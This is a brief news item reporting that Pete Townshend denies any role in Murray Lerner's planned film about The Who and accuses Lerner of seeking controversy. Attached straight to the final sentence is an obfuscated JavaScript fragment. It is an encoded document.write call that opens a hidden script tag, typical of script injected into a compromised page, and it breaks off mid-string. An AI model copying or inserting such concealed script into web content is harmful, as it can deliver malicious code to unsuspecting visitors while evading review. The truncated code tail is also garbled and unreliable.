Pete Townshend is denying he's involved with a director's plan to make a film about The Who.
Townshend writes on his Web site he is not a producer of a film with Murray Lerner and Spitfire Films. He says he is not a driving force behind the movie, as was implied by a recent press release. He says it's a project by The Who's Roger Daltrey and Nigel Sinclair of Spitfire. Lerner's announcement asked for fans to contribute footage they may have of The Who at www.TheWhoMovie.com. Townshend says it sounds like Lerner is trying to generate controversy by asking for footage especially of the band being unruly or fighting. Townshend may have the power anyway: he owns most of The Who's songs. He says his music is not a commodity he gives to film makers and he'd rather offer it to a soap commercial than have it turned into a soap opera by Lerner.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
